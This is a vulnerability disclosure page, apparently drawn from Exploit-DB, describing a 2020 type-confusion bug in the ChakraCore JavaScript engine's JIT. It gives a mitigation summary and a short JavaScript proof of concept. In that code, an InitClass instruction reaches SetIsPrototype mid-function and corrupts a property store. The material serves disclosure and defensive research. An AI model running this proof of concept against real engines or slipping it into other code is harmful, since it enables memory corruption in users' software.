Vendor: N/A
By: Exploit-DB
CVSS: 7.8 (HIGH)
CWE: 843 (Type Confusion)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

InitClass Instruction to Reach SetIsPrototype Method

This PoC uses an InitClass instruction to reach the SetIsPrototype method. It creates an object o with two properties, a and b, and passes it to the opt function. opt sets o.b, declares a class A that extends its c parameter (which executes InitClass), and then stores the value parameter into o.a. After 2000 iterations, an object o of the same shape is passed to opt again, this time together with a constructor cons whose prototype has been set to o, so that InitClass calls SetIsPrototype on o while opt is running. The o.a property is then set to 0x1234 by the store at the end of opt.

Mitigation:

A patch exists for this issue; update to a fixed build of the affected engine. More generally, ensure that JIT-compiled property stores re-validate an object's type after any operation (such as making the object a prototype) that can change its internal layout, and that type confusion issues of this kind are addressed.

Exploit-DB raw data:

/*

Issue description

This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203). This time, it uses an InitClass instruction to reach the SetIsPrototype method.

PoC:
*/

function opt(o, c, value) {
    o.b = 1;

    // Declaring a class that extends c emits an InitClass instruction,
    // which ends up calling SetIsPrototype on c.prototype.
    class A extends c {

    }

    // Once opt is JIT-compiled, this store assumes o still has the
    // type it was compiled for.
    o.a = value;
}

function main() {
    // Warm up opt so it gets JIT-compiled with o as a plain {a, b} object.
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, (function () {}), {});
    }

    let o = {a: 1, b: 2};
    let cons = function () {};

    // o becomes cons.prototype, so the InitClass inside opt reaches
    // SetIsPrototype on o and changes its type mid-function.
    cons.prototype = o;

    opt(o, cons, 0x1234);

    print(o.a); // print() is the ChakraCore shell's (ch) output function
}

main();